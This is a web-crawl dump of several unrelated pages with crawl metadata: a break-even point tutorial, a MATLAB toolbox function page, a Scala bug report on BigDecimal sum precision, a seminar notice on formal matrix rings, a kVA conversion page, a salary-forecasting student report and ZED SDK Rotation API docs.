[ null, "https://stdiff.net/img/mb/20190205-mlflow.png", null, "https://stdiff.net/img/mb/20190205-steps.png", null, "https://stdiff.net/img/mb/20190205-git.png", null, "https://stdiff.net/img/mb/20190205-parameters.png", null, "https://stdiff.net/img/mb/20190205-processing.png", null, "https://stdiff.net/img/mb/20190205-src-tgt.png", null, "https://stdiff.net/img/mb/20190205-main.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8838477,"math_prob":0.7982031,"size":21575,"snap":"2022-05-2022-21","text_gpt3_token_len":4920,"char_repetition_ratio":0.12799592,"word_repetition_ratio":0.017624728,"special_character_ratio":0.22243337,"punctuation_ratio":0.11176889,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9627211,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-17T08:36:06Z\",\"WARC-Record-ID\":\"<urn:uuid:ca40ab60-6b1e-49be-a411-e4e8641c665e>\",\"Content-Length\":\"32973\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:18cdb3a1-378a-4743-b1df-a7b42de167d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:4d0d9648-3078-4bc9-9a02-dbcf7289fad2>\",\"WARC-IP-Address\":\"217.160.0.150\",\"WARC-Target-URI\":\"https://stdiff.net/MB2019021201.html\",\"WARC-Payload-Digest\":\"sha1:GR5UGAESPGWHK4776TCAZLOEALT74YF2\",\"WARC-Block-Digest\":\"sha1:MMVO6MI5SLUV23KFMHD4ZY27U26RIYXN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662517018.29_warc_CC-MAIN-20220517063528-20220517093528-00560.warc.gz\"}"}
https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/
[ "Do you want your business to make a profit? Duh, of course you do! But when you're starting out, it may take a few years before you get into profit territory. And even after you begin making a profit, you may be at the break-even point for a while. So, what is the break-even point?\n\nWhat is a break-even point?\n\nWhen your firm reaches the break-even point, your total sales equal your total expenses. This means that you're bringing in the same amount of money you need to cover all of your expenses and run your business. When you break even, your business does not make a profit. But it also does not have a loss.\n\nTypically, the first time you reach a break-even point means a positive turn for your business. When you break even, you're finally making enough to cover your operating costs.\n\nFinding your break-even point can help you determine if you have to do one or both of the following:\n\nIf your business's revenue is below the break-even point, you have a loss. But if your revenue is above the point, you have a profit.\n\nUse your break-even point to determine how much you need to sell to cover costs or make a profit. And monitor your break-even point to help set budgets, control costs, and decide a pricing strategy.\n\nBreak-even point formula\n\nIf you want your business to profit, you must know the break-even point formula. To know how to calculate the break-even point, you need the following:\n\nFixed costs\nVariable costs\nSelling price of the product\n\nSo, what's the difference between fixed vs. variable costs? Fixed costs are expenses that stay the same, regardless of how many sales you make. These are the expenses you pay to run your business, such as rent and insurance.\n\nOn the other hand, variable costs change based on your sales activity. When you sell more items, your variable costs increase. Examples of variable costs include direct materials and direct labor.\n\nYour selling price is how much you charge for one unit or product.\n\nWithout further ado, this is the break-even formula:\n\nBreak-even Point Per Unit = Fixed Costs / (Sales Price per Unit – Variable Costs per Unit)\n\nThe sales price per unit minus the variable cost per unit is also called the contribution margin. Your contribution margin shows you how much take-home profit you make from a sale.\n\nThe break-even point is your total fixed costs divided by the difference between the unit price and variable costs per unit. Keep in mind that fixed costs are overall costs, while the sales price and variable costs are per unit.", null, "To calculate your break-even point for sales dollars, use the following formula:\n\nBreak-even Point for Sales Dollars = Fixed Costs / [(Sales – Variable Costs) / Sales]\n\nYou can use the above formulas to perform a break-even analysis. A break-even analysis can help you see where you have to make adjustments with your pricing or expenses.", null, "Break-even point examples\n\nIf you're a visual learner, this one's for you. To further understand the break-even point calculation, check out a few examples below.\n\nBreak-even point in units\n\nCheck out some examples of calculating your break-even point in units.\n\nExample 1\n\nThe break-even point in units is the number of goods you need to sell to reach your break-even point. 
As a reminder, use the following formula to find your break-even point in units:\n\nFixed Costs / (Sales Price per Unit – Variable Costs per Unit)\n\nSay you own a toy store and want to find your break-even point in units. Your total fixed costs are \\$6,000, your variable costs per unit are \\$25, and your sales price per unit is \\$50. Plug your totals into the break-even formula to find out your break-even point in units.\n\n\\$6,000 / (\\$50 – \\$25) = 240 units\n\nYou need to sell 240 units to break even.\n\nExample 2\n\nLet's take a look at how cutting costs can impact your break-even point. Say your variable costs decrease to \\$10 per unit, and your fixed costs and sales price per unit stay the same.\n\n\\$6,000 / (\\$50 – \\$10)\n\\$6,000 / \\$40 = 150 units\n\nWhen you decrease your variable costs per unit, it takes fewer units to break even. In this case, you would need to sell 150 units (instead of 240 units) to break even.\n\nBreak-even point in sales dollars\n\nThe break-even point in dollars is the amount of income you need to bring in to reach your break-even point. Determine the break-even point in sales by finding your contribution margin ratio.\n\nAgain, this is the break-even point for sales dollars formula:\n\nFixed Costs / [(Sales – Variable Costs) / Sales]\n\nThe following component of the above formula is your contribution margin ratio: [(Sales – Variable Costs) / Sales]\n\nTo simplify things, let's use the same amounts from the last example:\n\nFixed costs: \\$6,000\nVariable costs per unit: \\$25\nSales price per unit: \\$50\n\nFirst, find your contribution margin. Again, this is your sales price per unit minus your variable costs per unit.\n\nContribution Margin = \\$50 – \\$25\nContribution Margin = \\$25\n\nContribution Margin Ratio = \\$25 / \\$50\nContribution Margin Ratio = 50% (or 0.50)" ]
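To tie the formulas and the two examples above together, here is a short sketch that reproduces the numbers; the function names are mine, not part of the original article.

```python
def breakeven_units(fixed_costs, price_per_unit, variable_cost_per_unit):
    """Break-even point in units = fixed costs / contribution margin per unit."""
    contribution_margin = price_per_unit - variable_cost_per_unit
    return fixed_costs / contribution_margin

def breakeven_sales_dollars(fixed_costs, price_per_unit, variable_cost_per_unit):
    """Break-even point in sales dollars = fixed costs / contribution margin ratio."""
    cm_ratio = (price_per_unit - variable_cost_per_unit) / price_per_unit
    return fixed_costs / cm_ratio

print(breakeven_units(6_000, 50, 25))          # 240.0 units (Example 1)
print(breakeven_units(6_000, 50, 10))          # 150.0 units (Example 2, lower variable costs)
print(breakeven_sales_dollars(6_000, 50, 25))  # 12000.0 dollars, from the 50% contribution margin ratio
```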
[ null, "https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/imager_1_7397_700.jpg", null, "https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/imager_2_7397_700.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9059364,"math_prob":0.8130745,"size":6088,"snap":"2022-05-2022-21","text_gpt3_token_len":1305,"char_repetition_ratio":0.18408942,"word_repetition_ratio":0.009775171,"special_character_ratio":0.22552562,"punctuation_ratio":0.101608805,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95583874,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-27T02:33:52Z\",\"WARC-Record-ID\":\"<urn:uuid:16a75f6b-c625-4417-a2d7-76b77a02de32>\",\"Content-Length\":\"16034\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c6b7b539-d5a8-4d18-b4b8-68514fe25fa3>\",\"WARC-Concurrent-To\":\"<urn:uuid:7b60b398-8da7-4c17-8e87-0f9bad46bf72>\",\"WARC-IP-Address\":\"104.21.41.154\",\"WARC-Target-URI\":\"https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/\",\"WARC-Payload-Digest\":\"sha1:3DH2GJLBJ3NV2KCGZQJOXR6QS37FHYSB\",\"WARC-Block-Digest\":\"sha1:HRAPQIDWDOYPTLPALHSP7DO2LWZ7YPSX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305052.56_warc_CC-MAIN-20220127012750-20220127042750-00048.warc.gz\"}"}
https://tocsy.pik-potsdam.de/CRPtoolbox/?q=fnc_ace
[ "# CRP Toolbox\n\n## ace\n\nFinds optimal transformation and maximal correlation.\n\n### Syntax\n\n``````mcor=ace(x,y,[w,ii,oi])\n[theta, phi]=ace(x,y,[,w,ii,oi])\n[theta, phi, mcor]=ace(x,y,[,w,ii,oi])\n[theta, phi, mcor, i, o, imax, omax]=ace(x,y,[,w,ii,oi])\n``````\n\n### Description\n\nEstimates the optimal transformations of the system theta(x)=phi(x) and computes the resulting maximal correlation mcor, where x is a one-column vector and y can be a multi-column vector.\n\n[theta, phi, mcor, i, o, imax, omax]=ace(x,y [,w,ii,oi]) estimates the optimal transformations theta, phi and the maximal correlation mcor, and outputs the number of inner iterations i, the number of outer iterations o, the break-up number of inner iterations imax and the break-up number of outer iterations omax. If the algorithm doesn't converge, the number of iterations will be negative.\n\nWithout output arguments, ace plots the optimal transformations theta and phi.\n\n### Parameters\n\nw is the half-length of the boxcar window, ii is the maximal number of inner iterations, oi is the minimal number of outer iterations.\n\n### Examples\n\n``````x=(-1:.002:1)+.3*rand(1,1001);\ny=(-1:.002:1).^2+.3*rand(1,1001);\ncorrcoef(x,y)\nace(y,x)\n``````" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5307624,"math_prob":0.999241,"size":1433,"snap":"2022-27-2022-33","text_gpt3_token_len":395,"char_repetition_ratio":0.15675297,"word_repetition_ratio":0.021052632,"special_character_ratio":0.27424982,"punctuation_ratio":0.27246377,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995988,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-16T01:25:00Z\",\"WARC-Record-ID\":\"<urn:uuid:169318c2-ebff-4d8d-b661-438152ec3a45>\",\"Content-Length\":\"9737\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b7979d4-1ce1-42a5-a56d-bd5468cc019a>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a8f4dba-deab-4f8c-91ca-b4d93dd681e0>\",\"WARC-IP-Address\":\"193.174.19.232\",\"WARC-Target-URI\":\"https://tocsy.pik-potsdam.de/CRPtoolbox/?q=fnc_ace\",\"WARC-Payload-Digest\":\"sha1:62I77TUQOF6HCRISK46JWGXLNORDKNVI\",\"WARC-Block-Digest\":\"sha1:WODR3ZZXSE7DYHZS4I55LALJB5TG4W2S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572215.27_warc_CC-MAIN-20220815235954-20220816025954-00298.warc.gz\"}"}
https://github.com/scala/bug/issues/11592
[ "# BigDecimal and IterableOnce.sum #11592\n\nClosed\nopened this issue Jun 26, 2019 · 2 comments\n\nProjects\nNone yet\nMember\n\n### dwijnand commented Jun 26, 2019\n\n There is second problem with `sum`: ``````Welcome to Scala 2.13.0 (OpenJDK 64-Bit Server VM, Java 1.8.0_212). Type in expressions for evaluation. Or try :help. scala> :paste // Entering paste mode (ctrl-D to finish) import java.math.MathContext object BigDecimalTest { def main(args: Array[String]): Unit = { test() } def test(): Unit = { val bds = List( scala.math.BigDecimal(\"1000000000000000000000000.1\", MathContext.UNLIMITED), scala.math.BigDecimal(\"9.0000000000000000000000009\", MathContext.UNLIMITED)) assert(bds.sum == scala.math.BigDecimal(\"1000000000000000000000009.1000000000000000000000009\", MathContext.UNLIMITED)) // Below line works with scala 2.13.0 //assert(bds.foldLeft(BigDecimal(0, MathContext.UNLIMITED))(_ + _) == scala.math.BigDecimal(\"1000000000000000000000009.1000000000000000000000009\", MathContext.UNLIMITED)) println(\"BigDecimal works\") } } // Exiting paste mode, now interpreting. import java.math.MathContext defined object BigDecimalTest scala> BigDecimalTest.test java.lang.AssertionError: assertion failed at scala.Predef\\$.assert(Predef.scala:267) at BigDecimalTest\\$.test(:14) ... 28 elided `````` Which is probably caused by wrong math context with `num.zero` in here: https://github.com/scala/scala/blob/6b4d32c3f518d21a798e8d3cf4a8c35866afa8e2/src/library/scala/collection/IterableOnce.scala#L915 I can't stress enough that this change with 2.13 is highly surprising, even though orinal implementation with 2.11 and 2.12 has been broken. P.S. Above code works with 2.12.8 Originally posted by @35VLG84 in #11590 (comment)\n\nClosed\n\n### 35VLG84 commented Jun 26, 2019 • edited\n\n As @Ichoran pointed out in #11590 (comment) this applies also for `product`, which is broken on 2.11.12, 2.12.8 and 2.13.0: ``````Welcome to Scala 2.13.0 (OpenJDK 64-Bit Server VM, Java 1.8.0_212). Type in expressions for evaluation. Or try :help. scala> :paste // Entering paste mode (ctrl-D to finish) import java.math.MathContext val bds = List( scala.math.BigDecimal(\"1000000000000000000000000.1\", MathContext.UNLIMITED), scala.math.BigDecimal(\"9.00000000000000000000000091\", MathContext.UNLIMITED)) val prod = bds.foldLeft(BigDecimal(1, MathContext.UNLIMITED))(_ * _) assert(prod.toString == \"9000000000000000000000001.810000000000000000000000091\") // Exiting paste mode, now interpreting. import java.math.MathContext bds: List[scala.math.BigDecimal] = List(1000000000000000000000000.1, 9.00000000000000000000000091) prod: scala.math.BigDecimal = 9000000000000000000000001.810000000000000000000000091 scala> bds.product res1: scala.math.BigDecimal = 9000000000000000000000001.810000000 scala> assert(prod == bds.product) java.lang.AssertionError: assertion failed at scala.Predef\\$.assert(Predef.scala:267) ... 28 elided ``````\n\n### Ichoran commented Jun 26, 2019\n\n For reference, my suggested fix is to use `reduceOption` rather than `foldLeft` to implement these. (If someone doesn't like the overhead, then something like ``````val i = xs.iterator if (!i.hasNext) num.one else { var x = i.next while (i.hasNext) x = num.times(x, i.next) x } `````` for IterableOnce, with maybe an override for efficiency in List and IndexedSeq.)\n\nMerged\n\n### pullbot pushed a commit to Pandinosaurus/scala that referenced this issue Jul 15, 2019\n\n``` Fixes scala/bug#11592 (scala#8221) ```\n`Fixes scala/bug#11592`\n``` ae0ca7d ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8759988,"math_prob":0.9497745,"size":1621,"snap":"2019-26-2019-30","text_gpt3_token_len":511,"char_repetition_ratio":0.12306741,"word_repetition_ratio":0.0,"special_character_ratio":0.29056138,"punctuation_ratio":0.13333334,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9719376,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-19T23:20:37Z\",\"WARC-Record-ID\":\"<urn:uuid:c193d47a-7e01-4c17-b29e-bb2eb6c9ea7f>\",\"Content-Length\":\"107147\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:013d8378-874e-4461-84f5-c1fc1ab315c4>\",\"WARC-Concurrent-To\":\"<urn:uuid:bcb6f3f1-78f3-42a1-8e91-7b41a546a212>\",\"WARC-IP-Address\":\"140.82.113.4\",\"WARC-Target-URI\":\"https://github.com/scala/bug/issues/11592\",\"WARC-Payload-Digest\":\"sha1:HSMDVENPC5PICWOSVKXUALH7GKHEBKRV\",\"WARC-Block-Digest\":\"sha1:EKJGXITDPZEZJCZGUHEXQWAA2ZLTAQOX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526386.37_warc_CC-MAIN-20190719223744-20190720005744-00134.warc.gz\"}"}
http://www.buildrtoys.com/info/1011/1315.htm
[ "# Capital Normal University Algebra Forum, Series Talk 25 (首师代数论坛系列报告(二十五))\n\nFormal matrix rings over a ring are a generalization of matrix rings over a ring; they were introduced by Tang and Zhou in 2013 and have been studied in recent years. In this talk, we mainly introduce the concept and properties of formal matrix rings over a ring. The idempotents of formal matrix rings over a ring, systems of formal linear equations over a commutative ring, and the zero-divisors and zero-divisor graphs of a formal matrix ring over a commutative ring are studied. Linear recurring sequences over a formal matrix ring, tensor products of formal matrices, and their applications will also be discussed." ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.716187,"math_prob":0.94488907,"size":1452,"snap":"2022-40-2023-06","text_gpt3_token_len":928,"char_repetition_ratio":0.14571823,"word_repetition_ratio":0.029850746,"special_character_ratio":0.19283746,"punctuation_ratio":0.07111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.975937,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T22:42:00Z\",\"WARC-Record-ID\":\"<urn:uuid:db123180-bfb2-4285-a3e6-63b617064b9a>\",\"Content-Length\":\"18610\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a14b8fc1-3e1e-4cff-ad42-94e5c6a407b3>\",\"WARC-Concurrent-To\":\"<urn:uuid:e952fc5e-b1ed-4395-a060-ff9ce7dbd57c>\",\"WARC-IP-Address\":\"50.2.18.97\",\"WARC-Target-URI\":\"http://www.buildrtoys.com/info/1011/1315.htm\",\"WARC-Payload-Digest\":\"sha1:BHD66DVENFCMW4P7EEB46GZDZ36TCCOC\",\"WARC-Block-Digest\":\"sha1:IN4XRNO4M3ZD3MVDF45FRL3XYXOUXYIZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499891.42_warc_CC-MAIN-20230131222253-20230201012253-00051.warc.gz\"}"}
https://www.ca5.co/convert/electric/kva-to-va
[ "# How to convert kVA to VA\n\nHow to convert apparent power from kilovolt-amps (kVA) to volt-amps (VA).\n\n### kVA to VA calculation formula\n\nThe apparent power S in volt-amps (VA) is equal to 1000 times the apparent power S in kilovolt-amps (kVA):\n\nS(VA) =  1000 × S(kVA)\n\nSo volt-amps are equal to 1000 times kilovolt-amps:\n\nVA = 1000 × kilovolt-amps\n\nor\n\nVA = 1000 × kVA\n\n#### Example\n\nWhat is the apparent power in volt-amps when the apparent power in kilovolt-amps is 3 kVA?\n\nSolution:\n\nS = 1000 × 3kVA = 3000VA\n\nHow to convert VA to kVA ►" ]
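A one-line sketch of the conversion above; the function name is mine.

```python
def kva_to_va(s_kva: float) -> float:
    """Apparent power in volt-amps: S(VA) = 1000 * S(kVA)."""
    return 1000.0 * s_kva

print(kva_to_va(3))  # 3000.0 VA, matching the example above
```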
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67295665,"math_prob":0.9997799,"size":425,"snap":"2020-34-2020-40","text_gpt3_token_len":149,"char_repetition_ratio":0.22327791,"word_repetition_ratio":0.0,"special_character_ratio":0.33411765,"punctuation_ratio":0.05882353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9980025,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-26T23:50:15Z\",\"WARC-Record-ID\":\"<urn:uuid:3ed9ac71-8577-4911-a27b-e5d255fd3b19>\",\"Content-Length\":\"9372\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13485d33-2005-4212-919d-5a01ab31e3d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:c06ddc5c-6749-433e-85ca-531a232d00e3>\",\"WARC-IP-Address\":\"157.245.130.6\",\"WARC-Target-URI\":\"https://www.ca5.co/convert/electric/kva-to-va\",\"WARC-Payload-Digest\":\"sha1:EYLGA2BNRY5RSYLJDJYMU66BTEVAO2EH\",\"WARC-Block-Digest\":\"sha1:NJQDRJHOGC7MEONUB7LPGQ7MP7FAMKAD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400249545.55_warc_CC-MAIN-20200926231818-20200927021818-00469.warc.gz\"}"}
https://www.ozassignments.com/solution/bit110-business-mathematics-and-statistics-paper-editing-service
[ "# BIT110 Business Mathematics and Statistics Paper Editing Service", null, "## Introduction\n\nThis business mathematics and statistics report contains details about the salaries of bachelor degree graduates in Australia. The report deals with 23 different bachelor courses and analyses the salaries for each of them. The data covers the years 1999 to 2015. After analysing the details of the different courses over these 16 years, the salaries for the years 2016 to 2025 are forecast. Two different analyses are performed: one is linear regression and the other is the moving average business analysis, and there is some variation between the values from the two analyses. In the report, the moving average is used to calculate the average salary for the years 2016 to 2025. In the calculation for the year 2016, the average of the years 2012 to 2015 is taken. The same calculation is used for the years 2017 to 2019, with the averaged years shifting: for 2017 it is 2013 to 2016, for 2018 it is 2014 to 2017, and for 2019 it is 2015 to 2018. After that, for the year 2020, an average of the five years from 2015 to 2019 is taken, and the same process is used for the years 2021 to 2024. Finally, for the year 2025, an average of the 10 years from 2015 to 2024 is taken.\n\n### Purpose of the report\n\nThis assignment provides details of the salaries of the various bachelor courses. The report mainly deals with forecasting salary values for the years 2016 to 2025. To calculate these values, two different analyses are performed. In addition, the report provides information about how the calculations are performed and how the two different methods work. The report includes different graphs related to the salaries of bachelor degree graduates over the span of the years 2016 to 2025, based on the years 1999 to 2015. All the data used for the calculations and for finding the salary values are taken from the Graduate Careers website (Careers, n.d.).\n\n### Findings\n\nThe report contains findings on the salaries of the different years, based on the previous years. Forecasting of the salaries is completed using two different approaches: one uses moving average analysis and the other is based on linear regression analysis. The graph below shows the salary values for 2016 obtained with the moving average analysis.\n\nCalculation with the moving average analysis: for the year 2016, the values of the years 2012 to 2015 (a four-year span) are taken, and the same calculation is used for the years 2017 to 2019. For the year 2020, the calculation is done by taking the values from 2015 to 2019 (five years), and the same calculation is used for the years 2021 to 2024. For the year 2025, the values for the years 2015 to 2024 (10 years) are taken (Nelson, 2017).", null, "After that, an analysis is done using the forecasted values for the years 2016, 2017 and 2025. This calculation is completed with the moving average analysis (Excel, n.d.).", null, "After that, an analysis is done on the calculation for 2024 to 2025, because in this part of the calculation an average of 10 years is taken.", null, "All of these are part of the calculation done with the moving average analysis. 
Below is the analysis based on linear regression.\n\nThe first analysis is done for the years 2015 and 2016. The calculation takes its values from the regression analysis: the values of the dependent variable and r are found based on the salary in 2015. The value for the independent variable is 21.63819435 and the value of r is 0.984835931. Using these values, different calculations are performed to forecast the salary for 2016 from the salary of 2015. The graph below shows the changes in the salary values.", null, "After that, another calculation is done using all the forecasted values for the years 2016, 2017 and 2025, with the use of linear regression (Zaiontz, 2017).\n\n### Conclusion\n\nIn this business mathematics and statistics report, different analyses are performed and the calculations for these analyses are also covered. The report starts with a summary and ends with the calculation part of the analysis. The calculation and analysis part begins with the moving average method, which is used to calculate the forecasted salary values for the years 2016 to 2025 with different averaging windows: for the years 2016 to 2019 an average of the last four years is taken, for the year 2020 an average of the last five years, and for the year 2025 an average of the last 10 years. Different graphs for these calculations are attached to the report. The next part covers the calculation with linear regression. That calculation is based on the dependent values, the independent values and r, where r is the regression coefficient. All the values are calculated in the report, and with the use of these values the forecasted salaries for the years 2016 to 2025 are also calculated." ]
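A minimal sketch of the moving-average forecasting scheme described in the report (4-year averages for 2016-2019, 5-year averages for 2020-2024, a 10-year average for 2025), where earlier forecasts feed into later ones. The salary history itself is a placeholder, since the actual figures come from the Graduate Careers data cited above.

```python
def forecast_salaries(history):
    """history: dict year -> salary for 1999..2015; returns a dict of forecasts for 2016..2025."""
    series = dict(history)  # forecasts are appended here and reused by later years
    for year in range(2016, 2026):
        if year <= 2019:
            window = 4      # average of the previous four years
        elif year <= 2024:
            window = 5      # average of the previous five years
        else:
            window = 10     # 2025: average of the previous ten years
        series[year] = sum(series[y] for y in range(year - window, year)) / window
    return {year: salary for year, salary in series.items() if year >= 2016}
```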
[ null, "https://seofiles.s3.amazonaws.com/seo/media/cache/3c/ba/3cbac60b1e183f04f11e39573cfb6bf0.jpg", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/1.PNG", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/2.PNG", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/3.PNG", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/4.PNG", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8749511,"math_prob":0.93137395,"size":6276,"snap":"2023-14-2023-23","text_gpt3_token_len":1509,"char_repetition_ratio":0.20902424,"word_repetition_ratio":0.059880238,"special_character_ratio":0.26210964,"punctuation_ratio":0.14125201,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98449725,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-08T10:46:57Z\",\"WARC-Record-ID\":\"<urn:uuid:f5afb209-ca6f-4734-afdb-148089e26899>\",\"Content-Length\":\"46047\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:749559cb-1825-4d1a-8d6d-a32acadf69c0>\",\"WARC-Concurrent-To\":\"<urn:uuid:07f65295-de01-4799-b5ce-40d9b317583a>\",\"WARC-IP-Address\":\"52.38.47.176\",\"WARC-Target-URI\":\"https://www.ozassignments.com/solution/bit110-business-mathematics-and-statistics-paper-editing-service\",\"WARC-Payload-Digest\":\"sha1:JXXUEDF5TSY7P27NYGAHTL4IP77DZIE2\",\"WARC-Block-Digest\":\"sha1:AWONPX7YLV6JJGKYEU7QZHN63AYF6FBF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654871.97_warc_CC-MAIN-20230608103815-20230608133815-00531.warc.gz\"}"}
https://www.stereolabs.com/docs/api/python/classpyzed_1_1sl_1_1Rotation.html
[ "", null, "DOCUMENTATION SAMPLES API REFERENCE SUPPORT DOWNLOADS", null, "C++ Python C# C\nRotation Class Reference\n\nDesigned to contain rotation data of the positional tracking. More...\n\n## Functions\n\ndef init_rotation (self, Rotation rot)\nDeep copy from another Rotation . More...\n\ndef init_matrix (self, Matrix3f matrix)\nInits the Rotation from a Matrix3f . More...\n\ndef init_orientation (self, Orientation orient)\nInits the Rotation from a Orientation . More...\n\ndef init_angle_translation (self, float angle, Translation axis)\nInits the Rotation from an angle and an arbitrary 3D axis. More...\n\ndef set_orientation (self, Orientation py_orientation)\nSets the Rotation from an Orientation . More...\n\ndef get_orientation (self)\nReturns the Orientation corresponding to the current Rotation . More...\n\ndef get_rotation_vector (self)\nReturns the 3x1 rotation vector obtained from 3x3 rotation matrix using Rodrigues formula. More...\n\ndef set_rotation_vector (self, float input0, float input1, float input2)\nSets the Rotation from a rotation vector (using Rodrigues' transformation). More...\n\nConverts the Rotation as Euler angles. More...\n\ndef set_euler_angles (self, float input0, float input1, float input2, radian=True)\nSets the Rotation from the Euler angles. More...\n\ndef inverse (self)\nInverses the matrix.\n\ndef inverse_mat (self, Matrix3f rotation)\nInverses the Matrix3f passed as a parameter. More...\n\ndef transpose (self)\nSets the Matrix3f to its transpose.\n\ndef transpose_mat (self, Matrix3f rotation)\nReturns the transpose of a Matrix3f. More...\n\ndef set_identity (self)\nSets the Matrix3f to identity. More...\n\ndef identity (self)\nCreates an identity Matrix3f. More...\n\ndef set_zeros (self)\nSets the Matrix3f to zero.\n\ndef zeros (self)\nCreates a Matrix3f filled with zeros. More...\n\ndef get_infos (self)\nReturns the components of the Matrix3f in a string. More...\n\ndef matrix_name (self)\nName of the matrix (optional).\n\ndef r (self)\nNumpy array of inner data.\n\n## Detailed Description\n\nDesigned to contain rotation data of the positional tracking.\n\nIt inherits from the generic Matrix3f .\n\n## ◆ init_rotation()\n\n def init_rotation ( self, Rotation rot )\n\nDeep copy from another Rotation .\n\nParameters\n rot : Rotation to be copied.\n\n## ◆ init_matrix()\n\n def init_matrix ( self, Matrix3f matrix )\n\nInits the Rotation from a Matrix3f .\n\nParameters\n matrix : Matrix3f to be used.\n\nReimplemented from Matrix3f.\n\n## ◆ init_orientation()\n\n def init_orientation ( self, Orientation orient )\n\nInits the Rotation from a Orientation .\n\nParameters\n orient : Orientation to be used.\n\n## ◆ init_angle_translation()\n\n def init_angle_translation ( self, float angle, Translation axis )\n\nInits the Rotation from an angle and an arbitrary 3D axis.\n\nParameters\n angle : The rotation angle in rad. 
axis : the 3D axis (Translation) to rotate around\n\n## ◆ set_orientation()\n\n def set_orientation ( self, Orientation py_orientation )\n\nSets the Rotation from an Orientation .\n\nParameters\n py_orientation : the Orientation containing the rotation to set.\n\n## ◆ get_orientation()\n\n def get_orientation ( self )\n\nReturns the Orientation corresponding to the current Rotation .\n\nReturns\nThe orientation of the current rotation.\n\n## ◆ get_rotation_vector()\n\n def get_rotation_vector ( self )\n\nReturns the 3x1 rotation vector obtained from 3x3 rotation matrix using Rodrigues formula.\n\nReturns\nThe rotation vector (numpy array)\n\n## ◆ set_rotation_vector()\n\n def set_rotation_vector ( self, float input0, float input1, float input2 )\n\nSets the Rotation from a rotation vector (using Rodrigues' transformation).\n\nParameters\n input0 : First float value input1 : Second float value input2 : Third float value\n\n## ◆ get_euler_angles()\n\n def get_euler_angles ( self, radian = `True` )\n\nConverts the Rotation as Euler angles.\n\nParameters\n radian : Bool to define whether the angle in is radian (True) or degree (False). Default: True\nReturns\nThe Euler angles, as a numpy array representing the rotations arround the X, Y and Z axes.\n\n## ◆ set_euler_angles()\n\n def set_euler_angles ( 